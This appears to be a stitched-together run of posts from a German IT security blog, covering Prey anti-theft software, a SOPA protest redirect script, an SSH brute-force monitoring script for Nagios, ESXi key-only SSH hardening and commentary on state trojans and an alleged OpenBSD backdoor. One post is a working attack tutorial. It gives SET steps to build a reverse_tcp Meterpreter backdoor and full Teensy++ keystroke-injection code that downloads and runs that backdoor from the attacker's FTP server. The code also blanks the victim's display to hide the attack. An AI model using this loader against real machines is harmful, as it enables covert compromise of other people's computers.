Prey lets you keep track of your phone or laptop at all times, and will help you find it if it ever gets lost or stolen. It’s lightweight, open source software, and free for anyone to use. And it just works.

Vor allem letzteres wollen wir mal hoffen

Probieren konnte ich es selbst noch nicht, doch hier hilft eine andere Geschichte:

Stephan Meier* ist ein Geek. Der Schweizer lebt seit 10 Jahren in Rom. Doch aufgrund eines Todesfalles in seiner Familie, ist er während der Festtage nicht wie sonst üblich in die Skiferien gefahren, sondern hat sich im Raum Zürich bei seiner Verwandtschaft aufgehalten.

Am 31. Dezember ist er mit seiner Partnerin unterwegs in Richtung Toggenburg und lässt beim Umsteigen seine Tasche mit Notebook, Pass und weiteren Dokumenten in der S-Bahn nach Rapperswil liegen.

[...]

Aber nach ein paar Stunden findet die Durchsuchung statt, und die vemisste Tasche mit Notebook, Pass, usw. konnte sichergestellt werden. Zu guter letzt willigte auch noch die Staatsanwältin ein, die “Beweisstücke” freizugeben und Stephan kann morgen nach Rom zurück fahren, als ob nichts geschehen wäre.

Die ganze Story gibt es hier.

Insgesamt ein voller Erfolg, wenn man bedenkt, dass die Software zu installieren gerade mal ein paar Minuten in Anspruch nimmt. Klar, die Chance, dass der Benutzer die Maschine auch sogleich ans Internet hängt, ist sehr klein, doch ist es immerhin ein Lichtblick, als wenn man gar nichts getan hätte. Wer es nicht versucht, hat schon verloren!

Ganz cool, dass es Prey nicht nur für Windows, Mac oder Linux (Ubuntu) gibt, sondern auch für Android und iOS.

Das könnte dich auch interessieren:

1. Aufgabenverwaltung kann schön sein! Obwohl ich es auf meinem iPhone schon länger installiert habe,...
2. Demonstrationen in neuem Ausmasse: Internet Blackout geplant Die Zeiten von Demonstrationen auf der Strasse sind vorbei. Am...
3. Paketquellen für Windows Die Lösung heisst Ninite und gibt es eigentlich schon seit...

Das Gesetz würde es dem US-Justizministerium und Copyright-Inhabern erlauben, gerichtliche Verfügungen gegen die Betreiber von Internetseiten zu beantragen, die einen Verstoß gegen das US-amerikanische Copyright darstellen. Den Zweck der Maßnahme wählt der Antragsteller. Zum Beispiel kann eine Verfügung Werbeagenturen und Bezahldiensten die Zusammenarbeit mit Inhabern betroffener Internetseiten untersagen und so das Tätigen weiterer Geschäfte verhindern.

Auch das Anzeigen der Internetseite in Suchmaschinen könnte blockiert werden. Durch das Gesetz würde das Herunterladen geschützter Inhalte zu einer schweren Straftat.[...]

Doch nun soll etwas dagegen gemacht werden! Grosse Portale Wikipedia, Google, Yahoo, Mozilla oder Amazon, aber auch kleinere Webseiten und Blogs werden morgen, dem 18. Januar von 05:00 UTC an für 12 Stunden offline sein, aus Protest gegen die geplanten Gesetzesentwürfe.

Jimmy Wales von Wikipedia

Student warning! Do your homework early. Wikipedia protesting bad law on Wednesday! #sopa

Oder Mozilla:

@binarybits On Weds, @mozilla’s sites are planning to “go dark” for a while, replaced by content talking about how dangerous SOPA would be.

Andere wie Twitter oder Facebook rätseln noch, ob sie auch mitziehen wollen.
Die Tatsache, dass durch eine Abschaltung für 12 Stunden die meisten der Unternehmen Schäden in der Höhe ein paar Tausend bis ein paar Millionen Dollar hinnehmen, zeigt, wie ernst es um die beiden Gesetzesvorschläge steht.

Wer auch mitmachen möchte, der kann auf seiner Seite folgenden Javascript-Code einfügen, wodurch die Protestseite automatisch aktiviert und deaktiviert wird. Einfach in den Header, gleich vor dem /head einfügen:

<script>
var a=new Date;if(18==a.getDate()&&0==a.getMonth()&&2012==a.getFullYear()&&5<=a.getHours())window.location="http://blog.encodingit.ch/zensur.html";
var a=new Date;if(19==a.getDate()&&0==a.getMonth()&&2012==a.getFullYear()&&5>=a.getHours())window.location="http://blog.encodingit.ch/zensur.html";
</script>

Beides gibt es leider nicht bei meinem ESXi Server. Noch nicht mal eine anständige iptable oder hosts.deny sind vorhanden, geschweige denn von einer Firewall, wie es bei ESX Standard ist.

Um jedoch mal zu sehen, wie viele Personen versuchen, mein SSH zu knacken, habe ich ein einfaches kleines Script für Nagios geschrieben.

Ich weiss es kann noch viel optimiert werden dabei, doch es erfüllt seinen Zweck:

#!/bin/bash

# ####################################################################
# Check Syslog /var/log/SPLVS002.log for Brute Force Attacks via SSH
# by Patrick Schmid
# Version 1.0
######################################################################

export STATE_OK=0
export STATE_WARNING=1

time=`date +%H.%M.%S |cut -d'.' -f1`
time=`echo $time|sed 's/^0*//'`
time2=$(( $time - 1))
time3=$(( $time - 2))

if [ $time -lt 10 ]; then
        time=0$time
fi

if [ $time2 -lt 10 ]; then
        time2=0$time2
fi

if [ $time3 -lt 10 ]; then
        time3=0$time3
fi

compare=`tail -300 /var/log/SPLVS002.log |grep "from" |grep "root" |grep "attempt" | cut -d' ' -f3`
compare=`echo $compare | cut -d' ' -f1`

if [ $compare -lt 10  ]; then
        attackers=`tail -300 /var/log/SPLVS002.log |grep "from" |grep "root" |grep "attempt" | cut -d' ' -f4,14 |cut -d':' -f1,2,3 |sed -e 's/://' | tee -a |sed -e 's/://' |tee -a |grep "^$time\|^$time2\|^$time3" |cut -d' ' -f2 |sort |uniq`
        computers=`tail -300 /var/log/SPLVS002.log |grep "from" |grep "root" |grep "attempt" | cut -d' ' -f4,14 |cut -d':' -f1,2,3 |sed -e 's/://' | tee -a |sed -e 's/://' |tee -a |grep "^$time\|^$time2\|^$time3" |cut -d' ' -f2 |sort |uniq |wc -l`
        attemps=`tail -300 /var/log/SPLVS002.log |grep "from" |grep "root" |grep "attempt" | cut -d' ' -f4,14 |cut -d':' -f1,2,3 |sed -e 's/://' | tee -a |sed -e 's/://' |tee -a |grep "^$time\|^$time2\|^$time3" |cut -d' ' -f2 |sort |wc -l`
else
        attackers=`tail -300 /var/log/SPLVS002.log |grep "from" |grep "root" |grep "attempt" | cut -d' ' -f3,13 |cut -d':' -f1,2,3 |sed -e 's/://' | tee -a |sed -e 's/://' |tee -a |grep "^$time\|^$time2\|^$time3" |cut -d' ' -f2 |sort |uniq`
        computers=`tail -300 /var/log/SPLVS002.log |grep "from" |grep "root" |grep "attempt" | cut -d' ' -f3,13 |cut -d':' -f1,2,3 |sed -e 's/://' | tee -a |sed -e 's/://' |tee -a |grep "^$time\|^$time2\|^$time3" |cut -d' ' -f2 |sort |uniq |wc -l`
        attemps=`tail -300 /var/log/SPLVS002.log |grep "from" |grep "root" |grep "attempt" | cut -d' ' -f3,13 |cut -d':' -f1,2,3 |sed -e 's/://' | tee -a |sed -e 's/://' |tee -a |grep "^$time\|^$time2\|^$time3" |cut -d' ' -f2 |sort |wc -l`
fi

[ "$attackers" ] && echo -e "$attemps attemps from $computers attackers\n$attackers"
[ "$attackers" ] || echo "No Attack running"

[ "$attackers" ] && exit $STATE_WARNING
[ "$attackers" ] || exit $STATE_OK

Und schon sieht man in Nagios selbst, was so abgeht:

So dann weiter im Konzept! Es gibt zwar keine Möglichkeit, Angreifer aussperren oder ähnliches, jedoch aber kann man verhindern, dass das Passwort erraten werden kann, indem man das Login mit einem zusätzlichen Zertifikat schützt. Wie das geht, lest ihr in den folgenden Zeilen!

Zuerst wird ein Key generiert, mit ssh-keygen.
Nun kann der Public-Key kopiert werden, denn dieser muss auf den ESX wie folgt eingefügt werden:

mkdir /.ssh
touch /.ssh/authorized_keys
chmod 0600 -R /.ssh
echo "ssh-rsa KEY_HIER_EINFÜGEN" >> /.ssh/authorized_keys

Nun kann man das Login schon mal prüfen. Hier sollte man bereits mit dem Key einloggen können.

Jetzt wird das ganze noch abgesichert, damit es auch einen Reboot übersteht. Einfach den obigen Part in die Datei /etc/rc.local einfügen und abspeichern.
Und zu guter Letzt wird noch das Login ohne Zertifikat deaktiviert. Dazu wird in der Datei /etc/inetd.conf den beiden Punkten “ssh” der Parameter -s angefügt:

ssh      stream   tcp   nowait   root   /sbin/dropbearmulti   dropbear ++min=0,swap,group=shell -s -i -K60
ssh      stream   tcp6  nowait   root   /sbin/dropbearmulti   dropbear ++min=0,swap,group=shell -s -i -K60

Von nun an ist ein Login nur noch mit Zertifikat möglich, wodurch auch die lästigen Bots ausgebremst werden.

Das könnte dich auch interessieren:

1. Syslog Server für ESXi Nach dem ich entdeckt hatte, dass der ESX so intelligent...
2. ESXi sichern auf FTP Vor einiger Zeit hatte ich die Aufgabe ein Backup-Konzept für...
3. Vmware Image für ESXi aufbereiten Für eine Analyse gab es diese Woche eine Installation von...
4. DNS-320 mit fun_plug zu SSH Ganz cool an meinem NAS DNS-320 ist die Funktion des...
5. NAT konfigurieren unter ESX(i) NAT ist so eine Sache. Unter Vmware Workstation sehr einfach...

Die Rede ist vom Staatstrojaner! Soweit mir bekannt, war das Kapitel bisher eine Grauzone und nun, seit heute scheint das offiziell geregelt. Eigentlich auch ein gute Sache, nun aber was mir nicht ganz zusagen will, ist die Art wie das geregelt wurde!
Neu ist der Einsatz des Staatstrojaners vom Bundesrat niedergeschrieben worden und erlaubt so den Einsatz zur Überwachung, falls dies auf einem anderen Weg nicht möglich ist. So können neu also auch Gespräche via zum Beispiel Skype mitgehört oder aber verschlüsselte eMail -gelesen werden…
Eigentlich ist der Einsatz ja eingeschränkt; so darf der Staatstrojaner nur bei schweren Delikten eingesetzt werden. Nun ja, wer klassifiziert denn ein Delikt als “schwer”, das liegt ja wohl im Auge des Betrachters!

Einziger Lichtblick: Für Überwachungen via Mikrofon und Webcam soll das ganze nicht genutzt werden dürfen. Da frag ich mich doch, was passiert wenn ich am Skypen bin, da gebrauche ich ja auch mein Mikrofon und die ggf. die Webcam…

Vor allem wird das am Schluss ein Kampf zwischen Antiviren-Hersteller und Staat oder muss der Bundestrojaner dann per Entschluss immer excluded werden?

Wo soll das noch alles hinführen…

(via)

Dieses habe ich mit dem Tool tazusb zuerst auf meinen USB Stick kopiert und die Maschine dann von da her gestartet. Da ich nun einen USB Stick anstatt einer CD verwende, musste ich, als mich das System danach fragte, explizit angeben, dass TRK unter sdb1 zu finden sei.

Danach verlief alles problemlos und ich konnte das Passwort leeren, indem ich der einfachen Menüführung folgte und mich danach ohne Passwort auch gleich einloggen Eine super Alternative also zu Offline NT Password & Registry!

Naja, dass der Beitrag ein bisschen fragwürdig ist, muss ich nicht noch speziell erwähnen. Der Trojaner war ja schon installiert. Und wer dumm genug ist, einfach ein Anhang zu installieren, der sollte auch kein eBanking machen!
Und da das System über einen Trojaner geknackt wird, läuft der Angriff durch den Computer und nicht durch das Portal selbst. Somit bin ich der Meinung, dass die Bank nicht mehr verantwortlich ist für die Sicherheit. Jeder muss selbst wissen, auf welchem Computer er sich in sein eBanking einloggt!

Und in meinen Augen ist der ganze Angriff ein Witz: Welcher Computer blockiert denn bei einem Windows Update? Wäre ich im eBanking, so würde ich das Update wegklicken und später nochmals starten!

Ganz lustig ist ja auch noch die Reaktion der Banken! Ich wette, weder die Migrosbank, noch Raiffeisen werden auf Grund dieses Beitrages etwas ändern!

Alles was es dazu braucht, ist ein teensy++ 2.0, ein Linux (ich verwende BT5), SET, Metasploit, Teensyduino und ein Opfer (dies bist natürlich auch du). Eine feine Sache also

Nur wenn ich ehrlich bin, war ich von der Umsetzung durch SET mehr als enttäuscht! Die Attacke basiert auf einem Stück Code das versucht superintelligent zu sein, und dadurch alles versaut… So dauert das Laden der Backdoor zwar gerade mal ein paar Sekunden, jedoch, um überhaupt etwas laden zu können, wird zuerst 10 Sekunden lang eine Datei geschrieben, was ja auch nicht unbedingt das Gelbe vom Ei ist. Aber was in meinen Augen überhaupt nicht geht, der Code funktioniert nicht immer und das nur unter dem Englischen Tastaturlayout – alles andere als ausgereift also!

Also habe ich mich an die Umsetzung einer eigenen Lösung gemacht. Wer SET und Metasploit nicht selbst installieren will, der nimmt einfach die neuste Version von Backtrack, da ist alles bereits integriert.

Vorweg kann ich sagen, meine Lösung zum Laden der Backdoor basiert auf FTP. Ich bin mir durchaus bewusst, dass dieses Protokoll öfters gesperrt ist von LAN ins WAN bei grösseren Firmen, jedoch wenn ich über den Teensy++ angreife, dann brauche ich ja auch physikalischen Zugriff zur Maschine zum Einstecken, wodurch es dann sowieso meistens für Angriffe innerhalb des LAN genutzt wird.
Der Vorteil aber, da ftp als Standard auf einer Windows-Maschine schon vorhanden ist, muss ich nicht zuerst noch ein ganzes Downloadscript aufbauen, sondern kann direkt auf den FTP-Client der Konsole zurückgreifen, wodurch die Backdoor innert zwei bis drei Sekunden geladen und ausgeführt ist!

Damit das aber auch klappt, musste ich das angreifende System erst vorbereiten. Für den FTP-Server habe ich auf vsftpd zurückgegriffen. Die Konfiguration musste ich dabei nur minimal anpassen:

anonymous_enable=YES
anon_root=/var/www/

local_enable=NO
write_enable=NO

local_umask=022
dirmessage_enable=YES
xferlog_enable=YES
connect_from_port_20=YES
xferlog_file=/var/log/vsftpd.log
xferlog_std_format=YES
chroot_local_user=YES
chroot_list_enable=NO
listen=YES

pam_service_name=vsftpd
userlist_enable=NO
userlist_deny=NO
userlist_file=/etc/vsftpd/user_list
tcp_wrappers=YES

Wird nun der Dienst gestartet, so kann ich über den Anonymous-Benutzer von meinem Opfer (natürlich Windows ) auf /var/www des Angreifers zugreifen:

ftp -A 192.168.0.20

Nun verwende ich SET, um die benötigte Backdoor zu generieren. Dazu einfach den folgenden Ablauf einhalten:

• SET starten
• 6 für Teensy USB HID Attack Vector
• 2 für WSCRIPT HTTP GET MSF Payload
• yes um einen Payload zu kreieren
• 2 für meinen Lieblingspayload Windows Reverse_TCP Meterpreter
• ENTER für die Standard Backdoored Executable
• ENTER für den default Port

Nun wird die Backdoor x.exe generiert und unter /var/www/ verfügbar gemacht. Weiter wurde auch noch eine Datei reports/teensy.pde erstellt, aber wie schon beschrieben, ist dieser Loader einfach Schrott. Deshalb habe ich auch meinen eigenen entwickelt:

#include <phukdlib.h>

void setup() {
  delay(10000);

  CommandAtRunBarMSWIN("displayswitch.exe /external"); //nur unter Windows 7
  delay(500);
}

void loop () {
  CommandAtRunBarMSWIN("cmd /k");
  delay(500);
  Keyboard.print("ftp -A 192.168.0.20");
  PressAndRelease(KEY_ENTER, 1);
  Keyboard.print("GET x.exe");
  PressAndRelease(KEY_ENTER, 1);
  delay(500);
  Keyboard.print("quit");
  PressAndRelease(KEY_ENTER, 1);
  Keyboard.print("exit");
  PressAndRelease(KEY_ENTER, 1);

  CommandAtRunBarMSWIN("%userprofile%/x.exe");

  delay(3600000);
}

Alles was darin angepasst werden muss, ist die IP-Adresse zum angreifenden System. Und gegebenen Falls muss Zeile 6 entfernt werden. Diese funktioniert leider nur unter Windows 7 und bringt die Maschine dazu auf einen externen Monitor zu wechseln. Und während Windows für etwa 10 Sekunden versucht, diesen zu finden, wird das aktuelle Display deaktiviert, weshalb all die aufblitzenden Fenster und Terminals noch weniger auffallen.

Diese Datei wird nun wie jede andere zuerst in eine .HEX-Datei kompiliert und dann auf den teensy++ geflashed:

Wird der teensy++ nun auf einer Maschine eingesteckt, so geht das Display aus und das nächste was das Opfer sieht ist eine Fehlermeldung:

Selbst ein geübterer Benutzer wird denken, er habe wohl aus Versehen eine Tastenkombination gedrückt. Was im Hintergrund passiert ist, das wird er nicht erkennen:

Da ich mein Loader nicht für mich behalten wollte, habe ich mit Dave Kennedy Kontakt aufgenommen und ihm meine Idee erklärt. Wie es scheint, ist er nicht so offen für fremde Vorschläge, weshalb alles endete mit: “I won’t add ftp to teensy”. Seis drum, dann wird es halt nur hier veröffentlicht

Der Grund für diese Gedanken ist ein Beitrag auf einem anderen Blog. Da ich das nicht noch extra fördern will, verzichte ich hier auf einen Link! Darin wird Schritt-für-Schritt erklärt, wie man eine Man-in-the-Middle-Attacke aufbaut unter Verwendung von ettercap und ARP Spoofing. An sich ja keine schlechte Sache… Nur frage ich mich dann, was für Personen lesen solche Artikel, dass Kommentare wie die folgenden zu Stande kommen:

hab mal ne frage zu diesen kästchen wo immer so befehle oder so drinstehen wie “telnet server 25″ ,wo muss ich die eingeben ?? xD

Und das beste, wenn der Leser dann auch noch findet, er weiss es besser:

Hey ich hab jetzt nicht so so viel Erfahrung aber heißt das nicht “ipconfig” stat “ifconfig” ??

Da scheint Linux also doch nur ein Waschmittel zu sein…
Oder auch in Foren tauchen in letzter Zeit immer häufiger solche Fragen auf:

[...]
Wie kann man über das Netzwerk auf einen anderen Computer gelangen,
Was braucht man dafür(IP, Trojaner)?
Was hat das ganze mit dem “Hintertürchen” auf sich?
Wie kann man den Bildschirm/ die Daten der anderen betrachten?
Wie kann man das lernen, was würdet ihr mir empfehlen?

Da stelle ich mir schon die Frage, ob das Internet von heute nur noch aus Scriptkiddies besteht?
Erstaunlicherweise sind die Benutzer aus dem uu.de-Forum aber etwas erwachsener, denn da habe ich keine solche Fragen gefunden.

Mitunter ist das auch der Grund, wieso ich bei so heiklen Themen jeweils auf eine detaillierte Ausführung verzichte, um solchen naiven Kommentaren auszuweichen. Habt ihr da auch schon solche Erfahrungen gemacht?

Das könnte dich auch interessieren:

1. Wenn man einfach abschreibt… Ich mag irren, aber hier geht doch etwas nicht ganz...

Und hier liegt das grösste Problem: Wenn nun jemand böse Absichten hat, so kann er seinen Schadcode gut getarnt dem Projektteam vorlegen und darauf hoffen, das dieser aufgenommen wird.
Kommt der Schadcode durch, so hätte ein Angreifer jederzeit Zugriff auf Daten oder andere Informationen. In einem kleinen, unbekannten Projekt ist das zwar schrecklich, die Konsequenten sind aber nicht weiter verheerend.
Doch was nun, wenn es anstelle von einer unbedeutenden Software ein verbreitetes Projekt wie WordPress, Ubuntu, Typo3 oder Nagios betroffen ist… Somit hätte ein Angreifer Zugriff zu tausenden und abertausenden Systeme, Server oder Webseiten und Webappliaktionen! Nicht auszumalen, wie verheerend die Konsequenten wären…

Und, man glaub es kaum, ganz so abwegig ist das ganze nicht! Heute wurde in der OpenBSD-Nachrichtenliste ein erschreckendes eMail veröffentlicht:

Long time no talk. If you will recall, a while back I was the CTO at
NETSEC and arranged funding and donations for the OpenBSD Crypto
Framework. At that same time I also did some consulting for the FBI,
for their GSA Technical Support Center, which was a cryptologic
reverse engineering project aimed at backdooring and implementing key
escrow mechanisms for smart card and other hardware-based computing
technologies.

My NDA with the FBI has recently expired, and I wanted to make you
aware of the fact that the FBI implemented a number of backdoors and
side channel key leaking mechanisms into the OCF, for the express
purpose of monitoring the site to site VPN encryption system
implemented by EOUSA, the parent organization to the FBI. Jason
Wright and several other developers were responsible for those
backdoors, and you would be well advised to review any and all code
commits by Wright as well as the other developers he worked with
originating from NETSEC.

This is also probably the reason why you lost your DARPA funding, they
more than likely caught wind of the fact that those backdoors were
present and didn’t want to create any derivative products based upon
the same.

This is also why several inside FBI folks have been recently
advocating the use of OpenBSD for VPN and firewalling implementations
in virtualized environments, for example Scott Lowe is a well
respected author in virtualization circles who also happens top be on
the FBI payroll, and who has also recently published several tutorials
for the use of OpenBSD VMs in enterprise VMware vSphere deployments.

Das eMail von Gregory Perry beschreibt sein Geständnis, wie er vor 10 Jahren Geld von der US-Regierung, genauer dem FBI angenommen hatte und dafür mehrere Backdoor in OpenBSD mit einprogrammiert hatte…

Glücklicherweise sind die Auswirkungen laut Gregory Perry nach 10 Jahren nicht mehr ganz so verheerend:

Since we had the first IPSEC stack available for free, large parts of
the code are now found in many other projects/products. Over 10
years, the IPSEC code has gone through many changes and fixes, so it
is unclear what the true impact of these allegations are.

Wenn die US-Regierung für OpenBSD Geld springen liess, in wie vielen anderen Opensource-Projekten haben die denn sonst noch mitgemischt?!

Dabei habe ich mir mal wieder einige Gedanken über mein eigenes Passwort-Management Gedanken gemacht, und gemerkt, dass ich mich selbst nicht an alle Empfehlungen wie regelmässiges Ändern von Passwörtern, unterschiedliche Passwörter für unterschiedliche Konten und Dienste und ähnliches halte.

Nun wollte ich mal in die Runde fragen wie ihr denn das so handhabt?

Benutzt ihr ein Tool wie zum Beispiel den Schlüsselbund von Gnome? Oder ist bei eurem Benutzerpasswort ein Ablaufdatum gesetzt? Ändert ihr eure Passwörter überhaupt noch?

Wählt folgend die Optionen aus, welche euren Passwortalltag am besten beschreiben (mehrere Antworten möglich):

Und wer noch mehr zu sagen hat, der kann alles auch in einem Kommentar beschreiben.